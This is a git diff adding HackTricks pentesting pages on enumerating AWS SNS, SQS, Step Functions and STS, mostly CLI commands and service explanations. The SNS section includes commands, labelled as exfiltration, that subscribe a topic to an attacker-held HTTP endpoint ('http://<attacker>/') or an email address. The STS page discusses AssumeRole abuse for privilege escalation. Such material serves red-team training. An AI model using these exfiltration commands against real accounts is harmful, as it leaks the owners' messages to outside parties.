+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## SNS
+
+Amazon Simple Notification Service (Amazon SNS) is described as a **fully managed messaging service**. It supports both **application-to-application** (A2A) and **application-to-person** (A2P) communication types.
+
+Key features for A2A communication include **publish/subscribe (pub/sub) mechanisms**. These mechanisms introduce **topics**, crucial for enabling high-throughput, **push-based, many-to-many messaging**. This feature is highly advantageous in scenarios that involve distributed systems, microservices, and event-driven serverless architectures. By leveraging these topics, publisher systems can efficiently distribute messages to a **wide range of subscriber systems**, facilitating a fanout messaging pattern.
+
+### **Difference with SQS**
+
+**SQS** is a **queue-based** service that allows point-to-point communication, ensuring that messages are processed by a **single consumer**. It offers **at-least-once delivery**, supports standard and FIFO queues, and allows message retention for retries and delayed processing.\
+On the other hand, **SNS** is a **publish/subscribe-based service**, enabling **one-to-many** communication by broadcasting messages to **multiple subscribers** simultaneously. It supports **various subscription endpoints like email, SMS, Lambda functions, and HTTP/HTTPS**, and provides filtering mechanisms for targeted message delivery.\
+While both services enable decoupling between components in distributed systems, SQS focuses on queued communication, and SNS emphasizes event-driven, fan-out communication patterns.
+
+### **Enumeration**
+
+```bash
+# Get topics & subscriptions
+aws sns list-topics
+aws sns list-subscriptions
+aws sns list-subscriptions-by-topic --topic-arn <arn>
+
+# Check privescs & post-exploitation
+aws sns publish --region <region> \
+    --topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \
+    --message file://message.txt
+
+# Exfiltrate through email
+## You will receive an email to confirm the subscription
+aws sns subscribe --region <region> \
+    --topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \
+    --protocol email \
+    --notification-endpoint my-email@example.com
+
+# Exfiltrate through web server
+## You will receive an initial request with a URL in the field "SubscribeURL"
+## that you need to access to confirm the subscription
+aws sns subscribe --region <region>\
+    --protocol http \
+    --notification-endpoint http://<attacker>/ \
+    --topic-arn <arn>
+```
+
+{% hint style="danger" %}
+Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used (HTTP or HTTPS cannot be used).
+
+Also, even if the `--topic-arn` contains the region make sure you specify the correct region in **`--region`** or you will get an error that looks like indicate that you don't have access but the problem is the region.
+{% endhint %}
+
+#### Unauthenticated Access
+
+{% content-ref url="../aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md" %}
+[aws-sns-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md)
+{% endcontent-ref %}
+
+#### Privilege Escalation
+
+{% content-ref url="../aws-privilege-escalation/aws-sns-privesc.md" %}
+[aws-sns-privesc.md](../aws-privilege-escalation/aws-sns-privesc.md)
+{% endcontent-ref %}
+
+#### Post Exploitation
+
+{% content-ref url="../aws-post-exploitation/aws-sns-post-exploitation.md" %}
+[aws-sns-post-exploitation.md](../aws-post-exploitation/aws-sns-post-exploitation.md)
+{% endcontent-ref %}
+
+#### Persistence
+
+{% content-ref url="../aws-persistence/aws-sns-persistence.md" %}
+[aws-sns-persistence.md](../aws-persistence/aws-sns-persistence.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/](https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md b/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md
new file mode 100644
index 0000000000..e4c4256699
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md
@@ -0,0 +1,80 @@
+# AWS - SQS Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## SQS
+
+Amazon Simple Queue Service (SQS) is presented as a **fully managed message queuing service**. Its main function is to assist in the scaling and decoupling of microservices, distributed systems, and serverless applications. The service is designed to remove the need for managing and operating message-oriented middleware, which can often be complex and resource-intensive. This elimination of complexity allows developers to direct their efforts towards more innovative and differentiating aspects of their work.
+
+### Enumeration
+
+```bash
+# Get queues info
+aws sqs list-queues
+aws sqs get-queue-attributes --queue-url <url> --attribute-names All
+
+# More about this in privesc & post-exploitation
+aws sqs receive-message --queue-url <value>
+
+aws sqs send-message --queue-url <value> --message-body <value>
+```
+
+{% hint style="danger" %}
+Also, even if the `--queue-url` contains the region make sure you specify the correct region in **`--region`** or you will get an error that looks like indicate that you don't have access but the problem is the region.
+{% endhint %}
+
+#### Unauthenticated Access
+
+{% content-ref url="../aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md" %}
+[aws-sqs-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md)
+{% endcontent-ref %}
+
+#### Privilege Escalation
+
+{% content-ref url="../aws-privilege-escalation/aws-sqs-privesc.md" %}
+[aws-sqs-privesc.md](../aws-privilege-escalation/aws-sqs-privesc.md)
+{% endcontent-ref %}
+
+#### Post Exploitation
+
+{% content-ref url="../aws-post-exploitation/aws-sqs-post-exploitation.md" %}
+[aws-sqs-post-exploitation.md](../aws-post-exploitation/aws-sqs-post-exploitation.md)
+{% endcontent-ref %}
+
+#### Persistence
+
+{% content-ref url="../aws-persistence/aws-sqs-persistence.md" %}
+[aws-sqs-persistence.md](../aws-persistence/aws-sqs-persistence.md)
+{% endcontent-ref %}
+
+## References
+
+* https://docs.aws.amazon.com/cdk/api/v2/python/aws\_cdk.aws\_sqs/README.html
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md b/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md
new file mode 100644
index 0000000000..1ca042e366
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md
@@ -0,0 +1,359 @@
+# AWS - Step Functions Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Step Functions
+
+AWS Step Functions is a workflow service that enables you to coordinate and orchestrate multiple AWS services into serverless workflows. By using AWS Step Functions, you can design and run workflows that connect various AWS services such as AWS Lambda, Amazon S3, Amazon DynamoDB, and many more, in a sequence of steps. This orchestration service provides a visual workflow interface and offers **state machine** capabilities, allowing you to define each step of the workflow in a declarative manner using JSON-based **Amazon States Language** (ASL).
+
+## Key concepts
+
+### Standard vs. Express Workflows
+
+AWS Step Functions offers two types of **state machine workflows**: Standard and Express.
+
+* **Standard Workflow**: This default workflow type is designed for long-running, durable, and auditable processes. It supports **exactly-once execution**, ensuring tasks run only once unless retries are specified. It is ideal for workflows needing detailed execution history and can run for up to one year.
+* **Express Workflow**: This type is ideal for high-volume, short-duration tasks, running up to five minutes. They support **at-least-once execution**, suitable for idempotent tasks like data processing. These workflows are optimized for cost and performance, charging based on executions, duration, and memory usage.
+
+### States
+
+States are the essential units of state machines. They define the individual steps within a workflow, being able to perform a variety of functions depending on its type:
+
+* **Task:** Executes a job, often using an AWS service like Lambda.
+* **Choice:** Makes decisions based on input.
+* **Fail/Succeed:** Ends the execution with a failure or success.
+* **Pass:** Passes input to output or injects data.
+* **Wait:** Delays execution for a set time.
+* **Parallel:** Initiates parallel branches.
+* **Map:** Dynamically iterates steps over items.
+
+### Task
+
+A **Task** state represents a single unit of work executed by a state machine. Tasks can invoke various resources, including activities, Lambda functions, AWS services, or third-party APIs.
+
+* **Activities**: Custom workers you manage, suitable for long-running processes.
+  * Resource: **`arn:aws:states:region:account:activity:name`**.
+* **Lambda Functions**: Executes AWS Lambda functions.
+  * Resource: **`arn:aws:lambda:region:account:function:function-name`**.
+* **AWS Services**: Integrates directly with other AWS services, like DynamoDB or S3.
+  * Resource: **`arn:partition:states:region:account:servicename:APIname`**.
+* **HTTP Task**: Calls third-party APIs.
+  * Resource field: **`arn:aws:states:::http:invoke`**. Then, you should provide the API endpoint configuration details, such as the API URL, method, and authentication details.
+
+The following example shows a Task state definition that invokes a Lambda function called HelloWorld:
+
+```json
+"HelloWorld": {
+  "Type": "Task",
+  "Resource": "arn:aws:states:::lambda:invoke",
+  "Parameters": {
+    "Payload.$": "$",
+    "FunctionName": "arn:aws:lambda:<region>:<account-id>:function:HelloWorld"
+  },
+  "End": true
+}
+```
+
+### Choice
+
+A **Choice** state adds conditional logic to a workflow, enabling decisions based on input data. It evaluates the specified conditions and transitions to the corresponding state based on the results.
+
+* **Comparison**: Each choice rule includes a comparison operator (e.g., **`NumericEquals`**, **`StringEquals`**) that compares an input variable to a specified value or another variable.
+* **Next Field**: Choice states do not support don't support the **`End`** field, instead, they define the **`Next`** state to transition to if the comparison is true.
+
+Example of **Choice** state:
+
+```json
+{
+  "Variable": "$.timeStamp",
+  "TimestampEquals": "2000-01-01T00:00:00Z",
+  "Next": "TimeState"
+}
+```
+
+### Fail/Succeed
+
+A **`Fail`** state stops the execution of a state machine and marks it as a failure. It is used to specify an error name and a cause, providing details about the failure. This state is terminal, meaning it ends the execution flow.
+
+A **`Succeed`** state stops the execution successfully. It is typically used to terminate the workflow when it completes successfully. This state does not require a **`Next`** field.
+
+{% tabs %}
+{% tab title="Fail example" %}
+```json
+"FailState": {
+  "Type": "Fail",
+  "Error": "ErrorName",
+  "Cause": "Error details"
+}
+```
+{% endtab %}
+
+{% tab title="Succeed example" %}
+```json
+"SuccessState": {
+  "Type": "Succeed"
+}
+```
+{% endtab %}
+{% endtabs %}
+
+### Pass
+
+A **Pass** state passes its input to its output either without performing any work or transformin JSON state input using filters, and then passing the transformed data to the next state. It is useful for testing and constructing state machines, allowing you to inject static data or transform it.
+
+```json
+"PassState": {
+  "Type": "Pass",
+  "Result": {"key": "value"},
+  "ResultPath": "$.newField",
+  "Next": "NextState"
+}
+```
+
+### Wait
+
+A **Wait** state delays the execution of the state machine for a specified duration. There are three primary methods to configure the wait time:
+
+*   **X Seconds**: A fixed number of seconds to wait.
+
+    ```json
+    "WaitState": { 
+    	"Type": "Wait",
+    	"Seconds": 10,
+    	"Next": "NextState"
+    }
+    ```
+*   **Absolute Timestamp**: An exact time to wait until.
+
+    ```json
+    "WaitState": {
+      "Type": "Wait",
+      "Timestamp": "2024-03-14T01:59:00Z",
+      "Next": "NextState"
+    }
+    ```
+*   **Dynamic Wait**: Based on input using **`SecondsPath`** or **`TimestampPath`**.
+
+    ```json
+    jsonCopiar código
+    "WaitState": {
+      "Type": "Wait",
+      "TimestampPath": "$.expirydate",
+      "Next": "NextState"
+    }
+    ```
+
+### Parallel
+
+A **Parallel** state allows you to execute multiple branches of tasks concurrently within your workflow. Each branch runs independently and processes its own sequence of states. The execution waits until all branches complete before proceeding to the next state. Its key fields are:
+
+* **Branches**: An array defining the parallel execution paths. Each branch is a separate state machine.
+* **ResultPath**: Defines where (in the input) to place the combined output of the branches.
+* **Retry and Catch**: Error handling configurations for the parallel state.
+
+```json
+"ParallelState": {
+  "Type": "Parallel",
+  "Branches": [
+    {
+      "StartAt": "Task1",
+      "States": { ... }
+    },
+    {
+      "StartAt": "Task2",
+      "States": { ... }
+    }
+  ],
+  "Next": "NextState"
+}
+```
+
+### Map
+
+A **Map** state enables the execution of a set of steps for each item in an dataset. It's used for parallel processing of data. Depending on how you want to process the items of the dataset, Step Functions provides the following modes:
+
+*   **Inline Mode**: Executes a subset of states for each JSON array item. Suitable for small-scale tasks with less than 40 parallel iterations, running each of them in the context of the workflow that contains the **`Map`** state.
+
+    ```json
+    "MapState": {
+      "Type": "Map",
+      "ItemsPath": "$.arrayItems",
+      "ItemProcessor": {
+          "ProcessorConfig": {
+              "Mode": "INLINE"
+          },
+          "StartAt": "AddState",
+          "States": {
+              "AddState": {
+                  "Type": "Task",
+                  "Resource": "arn:aws:states:::lambda:invoke",
+                  "OutputPath": "$.Payload",
+                  "Parameters": {
+                      "FunctionName": "arn:aws:lambda:<region>:<account-id>:function:add-function"
+                  },
+                  "End": true
+              }
+          }
+      },
+      "End": true
+      "ResultPath": "$.detail.added",
+      "ItemsPath": "$.added"
+    }
+    ```
+*   **Distributed Mode**: Designed for large-scale parallel processing with high concurrency. Supports processing large datasets, such as those stored in Amazon S3, enabling a high concurrency of up 10,000 parallel child workflow executions, running these child as a separate child execution.
+
+    ```json
+    "DistributedMapState": {
+      "Type": "Map",
+      "ItemReader": {
+        "Resource": "arn:aws:states:::s3:getObject",
+        "Parameters": {
+          "Bucket": "my-bucket",
+          "Key": "data.csv"
+        }
+      },
+      "ItemProcessor": {
+        "ProcessorConfig": {
+          "Mode": "DISTRIBUTED",
+          "ExecutionType": "EXPRESS"
+        },
+        "StartAt": "ProcessItem",
+        "States": {
+          "ProcessItem": {
+            "Type": "Task",
+            "Resource": "arn:aws:lambda:region:account-id:function:my-function",
+            "End": true
+    	    }
+        }
+      },
+      "End": true
+      "ResultWriter": {
+        "Resource": "arn:aws:states:::s3:putObject",
+        "Parameters": {
+          "Bucket": "myOutputBucket",
+          "Prefix": "csvProcessJobs"
+    	  }
+    	}
+    }
+    ```
+
+### Versions and aliases
+
+Step Functions also lets you manage workflow deployments through **versions** and **aliases** of state machines. A version represents a snapshot of a state machine that can be executed. Aliases serve as pointers to up to two versions of a state machine.
+
+* **Versions**: These immutable snapshots of a state machine are created from the most recent revision of that state machine. Each version is identified by a unique ARN that combines the state machine ARN with the version number, separated by a colon (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:version-number`**). Versions cannot be edited, but you can update the state machine and publish a new version, or use the desired state machine version.
+* **Aliases**: These pointers can reference up to two versions of the same state machine. Multiple aliases can be created for a single state machine, each identified by a unique ARN constructed by combining the state machine ARN with the alias name, separated by a colon (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:aliasName`**). Aliases enable routing of traffic between one of the two versions of a state machine. Alternatively, an alias can point to a single specific version of the state machine, but not to other aliases. They can be updated to redirect to a different version of the state machine as needed, facilitating controlled deployments and workflow management.
+
+For more detailed information about **ASL**, check: [**Amazon States Language**](https://states-language.net/spec.html).
+
+## IAM Roles for State machines
+
+AWS Step Functions utilizes AWS Identity and Access Management (IAM) roles to control access to resources and actions within state machines. Here are the key aspects related to security and IAM roles in AWS Step Functions:
+
+* **Execution Role**: Each state machine in AWS Step Functions is associated with an IAM execution role. This role defines what actions the state machine can perform on your behalf. When a state machine transitions between states that interact with AWS services (like invoking Lambda functions, accessing DynamoDB, etc.), it assumes this execution role to carry out those actions.
+* **Permissions**: The IAM execution role must be configured with permissions that allow the necessary actions on other AWS services. For example, if your state machine needs to invoke AWS Lambda functions, the IAM role must have **`lambda:InvokeFunction`** permissions. Similarly, if it needs to write to DynamoDB, appropriate permissions (**`dynamodb:PutItem`**, **`dynamodb:UpdateItem`**, etc.) must be granted.
+
+## Enumeration
+
+ReadOnlyAccess policy is enough for all the following enumeration actions.
+
+```bash
+# State machines #
+
+## List state machines
+aws stepfunctions list-state-machines
+## Retrieve informatio about the specified state machine
+aws stepfunctions describe-state-machine --state-machine-arn <value>
+
+## List versions for the specified state machine 
+aws stepfunctions list-state-machine-versions --state-machine-arn <value>
+## List aliases for the specified state machine
+aws stepfunctions list-state-machine-aliases --state-machine-arn <value>
+## Retrieve information about the specified state machine alias
+aws stepfunctions describe-state-machine-alias --state-machine-alias-arn <value>
+
+## List executions of a state machine 
+aws stepfunctions list-executions --state-machine-arn <value> [--status-filter <RUNNING | SUCCEEDED | FAILED | TIMED_OUT | ABORTED | PENDING_REDRIVE>] [--redrive-filter <REDRIVEN | NOT_REDRIVEN>]
+## Retrieve information and relevant metadata about a state machine execution (output included)
+aws stepfunctions describe-execution --execution-arn <value>
+## Retrieve information about the state machine associated to the specified execution
+aws stepfunctions describe-state-machine-for-execution --execution-arn <value>
+## Retrieve the history of the specified execution as a list of events
+aws stepfunctions get-execution-history --execution-arn <value> [--reverse-order | --no-reverse-order] [--include-execution-data | --no-include-execution-data]
+
+## List tags for the specified step Functions resource
+aws stepfunctions list-tags-for-resource --resource-arn <value>
+
+## Validate the definition of a state machine without creating the resource
+aws stepfunctions validate-state-machine-definition --definition <value> [--type <STANDARD | EXPRESS>]
+
+# Activities #
+
+## List existing activities
+aws stepfunctions list-activities
+## Retrieve information about the specified activity
+aws stepfunctions describe-activity --activity-arn <value>
+
+# Map Runs #
+
+## List map runs of an execution
+aws stepfunctions list-map-runs --execution-arn <value>
+## Provide information about the configuration, progress and results of a Map Run
+aws stepfunctions describe-map-run --map-run-arn <value>
+## Lists executions of a Map Run
+aws stepfunctions list-executions --map-run-arn <value> [--status-filter <RUNNING | SUCCEEDED | FAILED | TIMED_OUT | ABORTED | PENDING_REDRIVE>] [--redrive-filter <REDRIVEN | NOT_REDRIVEN>]
+```
+
+## Privesc
+
+In the following page, you can check how to **abuse Step Functions permissions to escalate privileges**:
+
+{% content-ref url="../aws-privilege-escalation/aws-stepfunctions-privesc.md" %}
+[aws-stepfunctions-privesc.md](../aws-privilege-escalation/aws-stepfunctions-privesc.md)
+{% endcontent-ref %}
+
+## Post Exploitation
+
+{% content-ref url="../aws-post-exploitation/aws-stepfunctions-post-exploitation.md" %}
+[aws-stepfunctions-post-exploitation.md](../aws-post-exploitation/aws-stepfunctions-post-exploitation.md)
+{% endcontent-ref %}
+
+## Persistence
+
+{% content-ref url="../aws-persistence/aws-step-functions-persistence.md" %}
+[aws-step-functions-persistence.md](../aws-persistence/aws-step-functions-persistence.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://docs.aws.amazon.com/service-authorization/latest/reference/list\_awsstepfunctions.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsstepfunctions.html)
+* [https://docs.aws.amazon.com/step-functions/latest/dg/welcome.html](https://docs.aws.amazon.com/step-functions/latest/dg/welcome.html)
+* [https://states-language.net/spec.html](https://states-language.net/spec.html)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md b/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md
new file mode 100644
index 0000000000..ad755d1157
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md
@@ -0,0 +1,126 @@
+# AWS - STS Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## STS
+
+**AWS Security Token Service (STS)** is primarily designed to issue **temporary, limited-privilege credentials**. These credentials can be requested for **AWS Identity and Access Management (IAM)** users or for authenticated users (federated users).
+
+Given that STS's purpose is to **issue credentials for identity impersonation**, the service is immensely valuable for **escalating privileges and maintaining persistence**, even though it might not have a wide array of options.
+
+### Assume Role Impersonation
+
+The action [AssumeRole](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html) provided by AWS STS is crucial as it permits a principal to acquire credentials for another principal, essentially impersonating them. Upon invocation, it responds with an access key ID, a secret key, and a session token corresponding to the specified ARN.
+
+For Penetration Testers or Red Team members, this technique is instrumental for privilege escalation (as elaborated [**here**](../aws-privilege-escalation/aws-sts-privesc.md#sts-assumerole)). However, it's worth noting that this technique is quite conspicuous and may not catch an attacker off guard.
+
+#### Assume Role Logic
+
+In order to assume a role in the same account if the **role to assume is allowing specifically a role ARN** like in:
+
+```json
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Principal": {
+        "AWS": "arn:aws:iam::<acc_id>:role/priv-role"
+      },
+      "Action": "sts:AssumeRole",
+      "Condition": {}
+    }
+  ]
+}
+```
+
+The role **`priv-role`** in this case, **doesn't need to be specifically allowed** to assume that role (with that allowance is enough).
+
+However, if a role is allowing an account to assume it, like in:
+
+```json
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Principal": {
+        "AWS": "arn:aws:iam::<acc_id>:root"
+      },
+      "Action": "sts:AssumeRole",
+      "Condition": {}
+    }
+  ]
+}
+```
+
+The role trying to assume it will need a **specific `sts:AssumeRole` permission** over that role **to assume it**.
+
+If you try to assume a **role** **from a different account**, the **assumed role must allow it** (indicating the role **ARN** or the **external account**), and the **role trying to assume** the other one **MUST** to h**ave permissions to assume it** (in this case this isn't optional even if the assumed role is specifying an ARN).
+
+### Enumeration
+
+```bash
+# Get basic info of the creds
+aws sts get-caller-identity
+aws sts get-access-key-info --access-key-id <AccessKeyID>
+
+# Get CLI a session token with current creds
+## Using CLI creds
+## You cannot get session creds using session creds
+aws sts get-session-token
+## MFA
+aws sts get-session-token --serial-number <arn_device> --token-code <otp_code>
+```
+
+### Privesc
+
+In the following page you can check how to **abuse STS permissions to escalate privileges**:
+
+{% content-ref url="../aws-privilege-escalation/aws-sts-privesc.md" %}
+[aws-sts-privesc.md](../aws-privilege-escalation/aws-sts-privesc.md)
+{% endcontent-ref %}
+
+### Post Exploitation
+
+{% content-ref url="../aws-post-exploitation/aws-sts-post-exploitation.md" %}
+[aws-sts-post-exploitation.md](../aws-post-exploitation/aws-sts-post-exploitation.md)
+{% endcontent-ref %}
+
+### Persistence
+
+{% content-ref url="../aws-persistence/aws-sts-persistence.md" %}
+[aws-sts-persistence.md](../aws-persistence/aws-sts-persistence.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/?utm\_source=pocket\_mylist](https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/?utm_source=pocket_mylist)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md b/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md
new file mode 100644
index 0000000000..c90be6f1dc
--- /dev/null
